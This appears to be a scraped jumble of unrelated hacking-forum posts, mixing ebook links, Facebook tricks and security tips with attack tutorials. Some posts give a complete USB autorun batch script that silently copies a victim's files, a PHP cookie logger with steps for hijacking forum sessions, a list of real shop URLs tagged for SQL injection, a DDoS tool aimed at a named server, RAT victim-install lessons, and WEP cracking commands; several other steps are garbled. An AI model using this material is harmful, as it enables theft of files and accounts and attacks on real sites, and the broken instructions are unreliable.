http://www.fakenamegenerator.com/
FREE DOWNLOAD E-BOOKS▐ ▬▬▬ - Linux Shell Scripting Cookbook, 2nd Edition DOWNLOAD LINK [ PDF ]: http://adf.ly/qSh4V READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/linux-shell-scripting-cook… - Kali Linux Cookbook DOWNLOAD LINK [ PDF ]: http://adf.ly/qSh4W READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/06/kali-linux-cookbook.html - Web Penetration Testing with Kali Linux DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4X READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/web-application-obfuscatio… - Web Application Obfuscation DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4Y READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/web-application-obfuscatio… - Network Security Hacks, 2nd Edition DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4Z READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/network-security-hacks-2nd… - Inside Cyber Warfare: Mapping the Cyber Underworld READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/inside-cyber-warfare-mappi… DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4a - Private Cloud Computing: Consolidation, Virtualization, and Service-Oriented Infrastructure DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4b READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/private-cloud-computing-co… - Low Tech Hacking: Street Smarts for Security Professionals DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4c READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/low-tech-hacking-street-sm… - Access Denied: The Practice and Policy of Global Internet Filterin DOWNLOAD E-BOOK [ PDF ]: http://adf.ly/qSh4d READ MORE ABOUT THIS BOOK: http://www.backtrack-pages.com/…/access-denied-practice-and… *** FREE DOWNLOAD AND READ MORE NEW E-BOOKS: *** http://www.backtrack-pages.com/search/label/E-Books
How To Trace Your Facebook Profile Visitors Now here we found who recently visited your profile. Follow below steps for get to know your FB recent visitors. Step 1) Go to your Facebook Profile Page. Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page. Step 3) Now press Ctrl + F from your keyboard to open search box. Step 4) Now search this code {"list": Step 5) You find some Facebook Profile Ids Step 6) There are some Facebook Profile Ids of your friends who visited recently. Step 7) The first one ID's are showing visits the most number of time. Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id For Example : www.facebook.com/100001257992988 Enjoy The Trick..
Steps to Unlock Android pattern lock: 1.Enabling USB Debugging: For this process to be a success, the device which you wish to unlock should be enabled with USB Debugging. For this go to Settings->Development- >USB debugging and enable it. 2. Connect the device to the computer: Now after making sure that the device is USB Debugging enabled, Connect it to the computer. Go to start and open CMD. Type the following code very carefully. adb shell Now press enter 3. Reboot: After giving the commands in the CMD, restart or reboot the android device. Now give any pattern and your device should be unlocked. If you any doubts in the above process, please feel free to contact us.
Obama becomes the first US president to write a computer program <<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> President Barack Obama, to kick off the annual Computer Science Education Week, has become the first US president (at least as far as we know) to write a computer program. While this might not seem like a big deal, this will be seen as a glowing endorsement for the code literacy movement — a campaign that, for the last couple of years, has been extolling the virtues of teaching kids how to program. The question is, however, will learning how to program give the Coder in Chief (sorry) the necessary mental faculties — the fabled coder mindset — to corral a bitterly partisan Congress into ratifying some useful laws? Is fixing US politics just a matter of a well-placed for-next loop? As always, ExtremeTech will tackle one of the trickiest issues facing society head-on. Yesterday, at an event on the White House complex in Washington, President Obama sat down with middle-schooler Adrianna Mitchell and finished a very simple computer program. He made Elsa, from the film Frozen, walk in a straight line. Most reports say that Obama wrote a single line of JavaScript, but I think he did even less than that. From the video (below) it sounds like he’s doing stage three of the Code.org Frozen tutorial, where he simply has to drag a block (which represents a line of JavaScript code) into the “code editor.” In the interests of journalistic integrity, I actually completed the entire Frozen tutorial and didn’t have to write a single line of code. It’s possible that the Coder in Chief was given a special, extra-hard version of the tutorial — because, well, he’s the leader of the free world! — but I doubt it somehow. I should also point out that it’s entirely possible that Bill Clinton, or indeed any of the recent US presidents, might have also dabbled in programming in their spare time. Anyway, putting my cynicism aside for a moment, the concept behind Obama’s first program is a good one. Last year Obama gave a rousing speech (below) about the value of learning to code and computer science in general — and now he’s actually doing it. If the POTUS can take the time to code, and perhaps to develop a more logical, rational mindset as a result, then so can the nation’s kids.
Best Free Sites to find Any Softwares Serial Key 1. www.youserials.com 2. www.unlimitedserials.com 3. www.superserials.com 4. www.serialportal.com 5. www.keygenguru.com 6. www.smartserials.com 7. www.appleserialnumberinfo.com 8. www.serialnumber.in 9. www.keygen.us 10. www.gamecopyworld.com
Make an Autorun Virus that Steals files as soon as its plugged into a computer. This is no Harmful to the other Person's Computer at all. So first Plug in Your USB then Navigate Your Way to it. Now ; Copy and Paste this Batch Code that will Steal the files if you are using Windows Xp ; Use This Batch Code. Code : ******** @echo off :CHECK if not exist "%&&&&%\Copied_files" md "%&&&&% \Copied_files" if exist "%systemdrive%\Documents and Settings" goto COPIER goto ERROR :COPIER if not exist "%&&&&%\Copied_files\%computername %" md "%&&&&%\Copied_files\%computername%" if not exist "%&&&&%\Copied_files\%computername %\VIDEOS" md "%&&&&%\Copied_files\%computer name%\VIDEOS" if not exist "%&&&&%\Copied_files\%computername %\PICTURES" md "%&&&&%\Copied_files\%computername% \PICTURES" if not exist "%&&&&%\Copied_files\%computername %\MUSIC" md "%&&&&%\Copied_files\%computer name%\MUSIC" if not exist "%&&&&%\Copied_files\%computername %\DOWNLOADS" md "%&&&&%\Copied_files\%computername% \DOWNLOADS" copy /y "%userprofile%\My Documents\*.*" "%&&&& %\Copied_files\%computername%" copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS" copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC" copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername% \PICTURES" copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername% \DOWNLOADS" MSG %username% "DONE!" exit :ERROR exit Now if You are Using Windows Vista ; Then Use This Batch Code. Code : ******** @echo off :CHECK if not exist “%&&&&%\Copied_files” md “%&&&&% \Copied_files” if exist “%systemdrive%\files” goto COPIER7 goto ERROR :COPIER7 if not exist “%&&&&%\Copied_files\%computername %” md “%&&&&%\Copied_files\%computername%” if not exist “%&&&&%\Copied_files\%computername %\VIDEOS” md “%&&&&%\Copied_files\%computer name%\VIDEOS” if not exist “%&&&&%\Copied_files\%computername %\PICTURES” md “%&&&&%\Copied_files\%computername% \PICTURES” if not exist “%&&&&%\Copied_files\%computername %\MUSIC” md “%&&&&%\Copied_files\%computer name%\MUSIC” if not exist “%&&&&%\Copied_files\%computername %\DOWNLOADS” md “%&&&&%\Copied_files\%computername% \DOWNLOADS” copy /y “%userprofile%\Documents\*.*” “%&&&&% \Copied_files\%computername%” copy /y “%userprofile%\Videos” “%&&&&%\Copied_ files\%computername%\VIDEOS” copy /y “%userprofile%\Music” “%&&&&%\Copied_ files\%computername%\MUSIC” copy /y “%userprofile%\Pictures” “%&&&&%\Copied_ files\%computername%\PICTURES” copy /y “%userprofile%\Downloads” “%&&&&% \Copied_files\%computername%\DOWNLOADS” MSG %username% “DONE!” exit :ERROR exit Now Replace &&&& with the name of your USB ; For example my USB's Name is "FiduHacker" Then Save it as FIDUHACKER.BAT or Whatever you Want. How this Batch file works is that it uses the MD Command or the Make Directory Command to Make the Copied_files folder and the files inside it. Then it Navigates its way to the Selected Folders and Pastes Them There. Now to make this file Autorun when we plug it. Now make another .txt file. Open this file & Paste this Code inside. Code : ******** [autorun] Open=&&&&.bat Action=File Copier So now replace the &&&& with Whatever You've Saved the Batch file as. Now Save it as autorun.inf Now Take Your USB Out and Plug it back in and the files will be Copied. if the files are not Automatically Copied, there will be an interface with option like "play with music player" and "read only" scroll down and u will find File copier
SQL #BY_Ibrahim_allan http://www.mbk-center.co.th/en/floorplan/shop.php?id=353 http://www.mynkmall.com/shop.php?id=2 http://www.karnaticlabrecords.com/cart.php?id=88 http://www.osaka-info.jp/osp/en/facility/shop.php?id=11 http://www.totalbhakti.com/shop.php?cid=34 http://www.oaxis.com/shop/product_detail.php?id=11 http://armorysq.org/main/shopping.php?id=87 http://www.bellasamui.com/koh-samui-shopping.php?id=8 http://www.antiquesincanada.com/shop.php?myID=496 http://www.mbtagifts.com/shop.php?c=4 http://www.slightergolf.com/products/shop.php?c=misc&id=8 http://teamgear.us/store.php?id=1 http://www.kidswithfoodallergies.org/resourcespre.php?id=1 http://www.invitatie.ro/shop.php?id =3 http://www.bs-sox.com/shop.php?id=4 http://www.kajakshop.hu/shop.php?id=49 http://www.ipicgroup.com/shopping_centre.php?id=1 http://www.hihitown.com/shop.php?id=187
#AngryIPScanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins. It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. Anybody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner. In order to increase scanning speed, it uses multithreaded approach: a separate scanning thread is created for each scanned IP address. The full source code is available, see the download page. http://angryip.org/download
CREATE A COOKIE LOGGER TO HACK ANY ACCOUNT. BY #THE_HJ A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it … Step 1: Copy & Save the notepad file from below and Rename it as Fun.gifStep 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php: $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?> Step 3: Create a new Notepad File and Save it as logfile.txt Step 4: Upload this file to your server cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) fun.gif -> http://www.yoursite.com/fun.gif If you don’t have any Website then you can use the following Website to get a Free Website which has php support : http://0fees.net/ Step 5: Go to the victim forum and insert this code in the signature or a post :
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9 Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor. Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information. Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login. BY #THE_HJ
How to convert Facebook Profile To a Facebook fan Page Hello readers , I have an excellent new trick for converting your facebook profile to a facebook fan page.But before converting you profile to a page i want you to be aware of few things- When You covert your your Profile to a Page all you friends will be automatically added as people who like your page. Only your photos will be transfered to the Page rest all the other contents will be deleted,so be sure to save all the important contents before your migration. Last but not least once you convert you profile to a page it will be permanent and you will not be able to get back your profile. So be sure before converting your profile and I will not be responsible for the loss of your profile. Click here to convert your Facebook profile to a Facebook fan Page https:// www.facebook.com /pages/ create.php?migra te
How to Change /Restore IMEI no on Android phones and tablets. BY #THE_HJ In case your IMEI no gets changed or you get an error saying Invalid IMEI no. Then there is no need to panic, you can easily get your IMEI no back. This is very rare error that rarely happens when installing a customized ROM. Before you begin you need to note down the IMEI number. There will be 2 IMEI number in case of a Dual Sim handset. You can find the IMEI number on the box pack and/or mentioned in the Battery Compartment. 1) Open the Dialer and type *#*#3646633#*#* you will enter the engineering mode. 2) Then swipe left to connectivity. In connectivity click the CDS information option and tap radio information and then tap phone 1. 3)Now enter the command AT+EGMR=1,7,THE-FIRST-IMEI-NUMBER And press enter. For second SIM tap phone 2 and type this command AT+EGMR=1,10,THE-SECOND-IMEI-NUMBER And press enter. If *#*#3646633#*#* does not work and if you are using a MediaTek powered handset you can download the utility called MTK Engineering Mode for free from Google Play, it will do the same
Retrieve Deleted Facebook Messages,Photosand Videos: Step 1: First of all,You will have to Click here to open Facebook General account Settings. Step 2: Once you open your general settings, you will see Download a Copy of your Facebook Data, So click on it to. Step 3: On the Next page you will see a Download Archive Button, Click on it and you will be prompt to enter your Password to Continue, This is a Security Step by Facebook. Step 4: After entering your Facebook Password, Click on Submit, On the next screen you will be shown that the download link for your data will be sent to your email id which you used to create your facebook account. Step 5: Wait for Few Minutes, check your mail. You will see a mail from facebook in your Inbox with Downloading link ready for you to download all your data. Step 6: Now After downloading the file. Unzip it and open the folder where you will find your messages, photos, vidoes. Pokes, Friend list etc. The Files will be in .html format so you will have to double click on the file and select your Favourite Browser to open the file, the File will open up in your browser where you will have access to all your data.
I stood up all night coding this 4 you all well finally here you all, HP DDOSER to take down HP ------------------------------------------------ It is easy to use and have a good day Spread the tool if you want and just a reminder it only targets HP if they change there site then that other site is down, I am tired of people saying Hidden project is the most secure private server well now it's not now it is time hp meets there doom! [!] https://www.mediafire.com/?2bmqg3r80qfll1z [!] All the requirements are in the folder, and it is only 23.11MB It takes HP down fast and ENJOYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
Penetrate setups first lesson: Open course in Port Router http://www.youtube.com/watch?v=AVQtdnWvdmw second lesson in open Port firewall http://www.youtube.com/watch?v=s7FqRDCLM2M third lesson: Date explain the site no-ip and worked Host http://www.youtube.com/watch?v=-Bv7gNpT8MU Lesson Four: Explaining the composition surfer Spynet and install victims http://www.youtube.com/watch?v=48PvwtozGNk was completed successfully penetrate setups Alrat programs cycle! Introduction of Oscar devastating! ________________________________________________ Oscar devastating speaks :: {protection from outside penetration} ________________________________________________ Besoa guys Ehna Hnakhadd subject of the first Ahan be all understand what the outside penetration? Contact is to Bigilk without your knowledge uniforms PAC Trac - of course in the external contacts to your device, but I'm very much languagesTo contact Kharji hacker means - first need Biatmd them to Bichterqk Ballbeck 1-Trac your IP Btaa victim 2-Albortat him open 3-open gaps him _____________________________________________ remains first need Huntalmha Kasai change your IP Btaa Ahan device to limit Legge Ichterqk Hillaqy your IP variable, and then, the failure of a break !!!!! Led program change your IP http://www.freesafeip.com/ar/pro affection from the main site Ahan nobody says Melgmin and Mnlen honorable and written off very simple terracing and what Maak chose the country to Aaozha and press opens the CHANGE IP Htlaqy not change your IP Keda have been your IP change ________________________________________________ step Altanih and the third one is very Mat excuse me I Ehglkua programs and Antoa downloaded, knowingly Ahan in Bostadt I got the download links for the programs people Talat said the bomb in his name bugoff program 1:10 de Baiqvl some gaps Almanmma program in the device, of course de non terracing Btenslh and open it and Htlaqy Two words enable and Htlaqy violin disable if received on the North word disable press them up to what remains right the whole enable Htlaqy 3 gaps Mbaagaflosh Maak countries Mbetagaflosh Ptoa important sources in Minfc Taatagafl device ________________________________________________ most important Port touch in the victim's Bacon device 445 Da followed Meta Sploat if open when the victim Bashl Hajaat Puppets Ui penetration P Ehna Henstkhaddm program Windows Worms Doors Cleaner 1.4.1 de Houdrtk Btenslh and Tighe at Alanh written to the port 445 and press the close ________________________________________________ Keda Congratulations you remain protect your computer from outside intrusion and if Jpkoa Thread landed your vote -._ . Oscar-destructive -._.- ________________________________________________ Oscar devastating speaks :: {protection from penetration by surfer} ________________________________________________ Soi guys Ehna Hnakhadd subject of the first Ahan have all understand what is to break through surfer - is a breakthrough that takes place to Almchterv Abatlk surfer and you do not know afford As soon as you open it give him a ride eloquent your device or you descend a file from the net open it is breached give him a ride Report from your ________________________________________________ Now you oh Jad'aan stayed protection from Alrat programs to come on programs to Petrf surfer on the victim's computer, of course the word {server = Patch} ________________________________________________ course protection of software de takes place very simple Antoa knowing that with Oscar. there is no need for her tough Ehna Henkhv mining surfer to have sold the penetrator and violin Hensolh Now you you what Ptfath server on your machine takes place needs Kteer Ui and Bacon where damage very much the victim as possible, for example ________________________________________________ 1. opens Alcamarl have friendly Protect yourself omitted you degrade any need Soda, if you have a camera Ashan breached Mishvkh ________________________________________________ 2-possible opens moxibustion Lugar - de remained Basgel to Baketbh moxibustion Bord friendly way to guaranteed billion Maiya to steal any Emil because of course you what Btakhtriq victim device in any Rat Bacon program Key to drag which you need Ptketbha on the keyboard Ptouselh is in keda file and moxibustion Luger takes place protection of it is very simple program written off and Cebu Mtamelc any need Tani named {KeyScrambler} course, excuse me, I Mbenzch links Ashan nobody says mg but of course, the program is very simple Staboa and Cebu _______________________________________________ 3 -memkn breached Arflk virus affection of course takes place through an executive extension Bacon Aldous bat affection file takes place protection from him in a way Vulture little sense I Halmk close the cmd and open in time to you wants to use ups Ahan protect yourself from the virus to Hervaholk at any time Ptfath start run gpedit.msc Administrative Templates i Ptdguet the word de Htlaqy Zartlk Qaama on the right Htakhtar system Htdguet them twice Hazarlk Qaama Htkhar word prevent access to the command prompt Htdguet them twice Htzarlk Qaama Htlaekayaa parameter word Not Configured you Htalm word Enabled and press ok course keda the cmd Httagafl Ahan open it stayed the same steps Htchil word Enabled and derogatory word Not Configured pressing Inter _______________________________________________ In Tanih characteristics of a very, very but Malhash inevitable if the server entered your device in you stayed needed secured yourself before the server admits originally in such a way in a very, very strong program too makes an Verual device frankly an excellent program and I myself Bstamlh mesh engages extension exe harmful files violin pygmy device and Baiqvl in some of the gaps and Baiqvl some Albortat course, the program is very, very simple written off and Sepah but TrustPort Internet Security _______________________________________________ Ok Now you Ehna cowardly file and we went Jain Adpsona and Fathnah and server device descended course in Bekshv communications program to exist in the device to come Albortat related device Tayyip course like what Colt before this 1.albefrost [bifrost] Allport granulated basic is Port 81 2.sbaa Net (spy net) Allport granulator is 288 3.aldark Comet [dark commet] Allport is granulated 1604 4.alx Trim [xtream rat] Allport granulator is 82 5.almita Spolit [met a sploit] Allport is granulated 4444 6.alngerat [njrat] 1177 Allport granulator is 7.allbeck Trac [backtrack] 445 Allport granulator is if received Port of Mtousel device States through the start run cmd netstat -n Talat column if received in the latest figures number of the names of the programs de know that your computer hacker In Bazaarham program of course, named X-NetStat Professional Bteja when Allport programs de pressing Kalak right and press Keller Port Hathompsh Alservrmen ________________________________________________ device In Tanih way through that if the server machine down and you wants to erase possible erase manual way de of stomping type dir patch and then press ENTER If your device is properly the result will be like this volume in drive c has no label Volume serial number is Directory of c: \ windows File not found if you find the patch delete it in the following way: C: \ Windows \ delete patch ________________________________________________ In Tanih way from the system registry file Registry 1- Click on Start 2. Write it in operation run box Next Regedit, and then Ok then open the following folders in the following order: 1- HKEY_LOCAL_MACHINE 2- SOFTWARE 3- MICROSOFT 4- WINDOWS 5- CURRENT VERSION 6- RUN RUN if a file opened you will open the system registry window and you will find at the top of the north filenames working with the Startup menu in the top right hand side of files addresses so: names __________ data if you find a file does not offset address in the DATA or appeared in front of a small arrow so
A hacker in tips 1-penetrating devices (Pc Hacking) from here start your journey in breakthroughs, if you can figure out how to break through and managed to hack it now possible proposals tend to penetrate the sites 2-hacked websites (Website Hacking) and this way learn from your experience and your perseverance, not easy, but not impossible to learn. 3. run a firewall on the computer and the personal examples of the ZoneAlarm firewalls and beware of malware or so-called malware to your computer. Insulate them so as not to cause you any harm 4. gradual start is. .. For example: matbeda bekhtrak sites before hardware.. Don't discover gaps and you loophole untapped ready discoverer.. Penetrate the site protect weak before strong sites.. Etc., is gradual, the starting point is follow us on YouTube http://www.youtube.com/channel/UCuTxoPI4nyvsqMlz0C0L5eQ?spfreload=10
How To Hack Wifi Password with Android Hack wifi using android Method 1 of 2 : Hacking WEP Routers 1Root a compatible device.Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include: *.Nexus 7 *.Galaxy S1/S2 *.Nexus One *.Desire HD 2Download and install bcmon.This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website. *.To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this articlegoes into more detail. 3Run bcmon.After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported. *.Your device must be rooted in order to run bcmon. 4Tap "Run bcmon terminal".This will launch a terminal similar to most Linux terminals.Typeairodump-ngand tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Typeairodump-ng wlan0and tap the Enter button. 5Note the MAC address that appears.This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down. *.Also note the Channel that the access point is broadcasting on. 6Start scanning the channel.You will need to collect information from the access point for several hours before you can attempt to crack the password. Typeairodump-ng -cchannel#--bssidMAC address-w output ath0and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery. *.Keep scanning until you reach at least 20,000-30,000 packets. 7Crack the password.Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and typeaircrack-ng output*.capand tap Enter. 8Note the hexadecimal password when finished.After the cracking process is complete (which could take several hours), the messageKEY FOUND!will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key will not work. [2] *.When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter1234567890. Method 2 of 2: Using Osmino Wi-Fi 1Open Google Play.Osmino can be downloaded for free from the Play Store. This app will scan the available access points and let you connect to ones that have had their passwords shared. This app doesn't do any hacking, but you can benefit from passwords that have been hacked by someone else. See this guidefor more detailed instructions for installing apps. *.Search “Osmino Free Wi-Fi” and install the first search result. 2Find out all the available networks in your location.This application will track down all the nearby Wi-Fi hotspots, and will also tell you whether or not you can connect with that network. 3Select a Wi-Fi network.You will see that some Wi-Fi Networks are displayed with either green or red icons. Select one whose icon is green. The one which is shown in green will be either the “Free Open Network” or the one which password has been made available to them. The developer has created a community through which users can provide passwords to each other. *.Be wary joining password-protected networks without permission, as this can be illegal
Ethical Hacking Course Part-10 Introductions to Social Engineering Attacks Like & Share #Hacking #SET #SocialEngineeringToolkit #SETToolkit #SocialEngineeringAttack #OffensiveSecurity #KaliLinuxTools #PenetrationTesting #EthicalHacking #HackingClass #HackingCourse #KaliLinux #KaliLinuxClass #KaliLinuxCourse #Pentest #Backtrack #BacktrackLinux #Hack #EthicalHackingCourse #BhargavTandel #WebPenetrationTesting #WebsitePentest #WebsitePenetrationTesting #CEH #CEHv8 #LPT http://youtu.be/uf9fv1eu-LU
How to Easily Recover Deleted files from Windows PC and Memory Cards Sometimes we accidentally delete some files in our Computer and Android Mobile. So here In this post I tell you How can you recover deleted files from Computer Drives, USB Pendrive and Memory Cards. With this method you get back all of your data. If you Learn How to recover your deleted data you can easily recover your movies, songs and Pictures. Recuva Recovery Software Recuva is free software by Piriform Company. With Recuva you can easily recover your deleted files from computer and all storage medias. Recuva is best free recover delete file software for Windows and Mac. How You Recover Deleted Files from Recuva tools 1 Download Recuva tool from here- http://www.filehippo.com/download_recuva 2. Install and run the application. 3. Choose the specific file and click on Next button. recover deleted files from recuva software 4. After that select the location of drive or folder, where you want search. 5. And after that click on "Next" Button and Enable deep scan if u want to scan deeply and click on "Start" button. 6. Now check the file which you want to recover and click on "Recover" button. 7. Now time to save the file, first choose the location of path or folder where you want to save the file after that click "OK" button. With Recuva you can easily recover files from Format SD Memory Card. This is one of the best for recovering deleted on any storage devices.
How To Hide Media Files from Android Phone's Gallery. BY #THE_HJ 1.Open your favorite file manager, such as Astro File Manager, ES File Explorer, and E-plore File Manager. If you don’t have one, you can download it for free at Google Play Store. 2.Find the specific folder (or album) that you want to be hidden from your android phone’s gallery. 3.Tap rename and put a .(dot) in front of the folder name (with no spaces). For example, .nomedia. Press OK and done. Your album or folder is now hidden and will not show up on your gallery. To show it up again, simply remove that dot to make it back to normal. You can view the hidden files in the file manager, make sure to check the ‘Show hidden files' in the settings menu BY #THE_HJ
In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started. How To Save Web Page To PDF File ? 1. Open the Google Chrome Browser on your PC or MAC 2. Then go to the web page that you want to convert as a PDF. 3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 4. Now Change the destination to “Save As PDF” and hit the save button. 5. The current web page will instantly be downloaded as a PDF document.
Android Hacking tool Hack Code: The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. Download Link : https://play.google.com/store/apps/details…
Refer your friends to Goibibo app and earn 100 Rs per referral . How to refer and earn:- To refer and earn just download the app from here- https://play.google.com/store/apps/details?id=com.goibibo open it and initiate your signup, sign up using the coupon GC6A248 to get 1000 Rs go cash, verify your mobile number, then click menu > refer and earn, share your referral code with friends and earn 100 Rs go cash per referral.
How you Earn 50$ Daily from Url Shortning http://papuhackers.blogspot.com/p/how-you-earn-50-daily-fro… HOW TO HACK WIFI PASSWORD EASY TRICK http://papuhackers.blogspot.com/p/how-to-hack-wifi-password… How to Change Window 7 and 8 User Password without Knowing Old Password http://papuhackers.blogspot.com/p/how-to-change-window-7-an… http://papuhackers.blogspot.com/
http://worldwideprogramers.blogspot.in/2014/10/how-to-hack-ebay-account.html
Security Tips By World's Most Wanted Hacker Kevin Mitnick Kevin Mitnick came by his security expertise the hard way. In the 1990s, his electronic penetration of some of the biggest companies in the world made him a notorious tech boogieman, and ultimately landed him five years in prison. Now free and clear, Mitnick has reinvented himself as a computer security consultant and writer. He travels the world teaching organizations how to secure their information in a world of corporate spies and younger versions of himself. He took a break from his jet-setting to share some practical security tips. Clip them and stick them on your parents' refrigerator or your IT administrator's white board. Here is Top 10 list of steps you should take to protect your information and your computing resources from the bad boys and girls of cyberspace: • Back up everything! You are not invulnerable. Catastrophic data loss can happen to you -- one worm or Trojan is all it takes. • Choose passwords that are reasonably hard to guess -- don't just append a few numbers to a no-brainer. Always change default passwords. • Use an antivirus product like AVG or Norton, and set it to update daily. • Update your OS religiously and be vigilant in applying all security patches released by the software manufacturer. • Avoid hacker-bait apps like Internet Explorer and disable automatic scripting on your e-mail client. • Use encryption software like PGP (pretty good privacy) when sending sensitive e-mail. You can also use it to protect your entire hard drive. • Install a spyware detection app -- or even several. Programs that can be set to run frequently, like SpyCop, are ideal. • Use a personal firewall. Configure it to prevent other computers, networks and sites from connecting to you, and specify which programs are allowed to connect to the net automatically. • Disable any system services you're not using, especially apps that could give others remote access to your computer (like Remote Desktop, RealVNC and NetBIOS). • Secure your wireless networks. At home, enable WPA (Wi-Fi protected access) with a password of at least 20 characters. Configure your laptop to connect in Infrastructure mode only, and don't add networks unless they use WPA. Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
How to build own Operating System.. ================================ You might be using Windows,LINUX or Mac Operating System from very long. Ever wondered how these Operating System are made ? Or Ever think of making own Operating System ?? The Operating System you are going to create online will be Linux Operating System. There is no technical skills required for creating an own Linux Operating System online. Linux is a kernel, which can be used to create Operating Systems. Operating System(s) created by using Linux kernel are called Linux Operating System(s). Example of Linux Operating Systems are Ubuntu and SUSE To create own Operating System you don’t need to be a computer master or a programmer, all you need is a website: SUSE Studio. Yes, you can create your own Operating System online from ---> www. susestudio .com www. susestudio .com Sign in with your account, have to select a base package and desktop environment, 32 bit or 64 bit and then have to customize it like Logo, Soft-wares etc. once you have created your Own Linux Operating System you have to click on build and have to download an ISO image. You can burn this ISO image in a CD/DVD and can use that CD/DVD to install your own Operating System, just like you do with Windows or Linux CD......
"Circle around the moon, rain or snow soon." 15+ Ways to Predict the Weather Without a Forecast http://www.wikihow.com/Predict-the-Weather-Without-a-Foreca…
20 Facebook Tips And Tricks You Should Know ======================================== ******************************************************************* +++++++++++++++++++++++++++++++++++++++ 1. Connect To Multiple Facebook Accounts You probably noticed that you can’t login to more than one account on Facebook. However, if you use Chrome, there is a built-in profile feature that allows you to create a new user profile on your browser. Click on the Navicon on the top right of your Chrome browser. Go to Settings. Go to Users, and click on Add new user. Choose your Profile Picture and give a name for that user. Click on Create and a new Window will be opened. You can now login to your Facebook account as per user profile and easily switch between users at the top right corner (see below). This is available on Firefox as well. Connect To Multiple Facebook Account 2. Sync Facebook Calendar With Google Calendar If you use both Facebook Calendar and Google Calendar to manage your everyday activities, you will need some time to manage both. Why not have your Facebook Events including birthday to sync with Google Calendar so that you don’t have to do it manually? Here’s how you can. Login to Facebook and click on Events. Go to the Calendar tab and click the Settings button on the top right then choose Export. You will see "export your friends birthdays" and "upcoming events" in a hyperlink; choose either one and copy the link address. Let’s say you pick birthdays first. Now, go to your 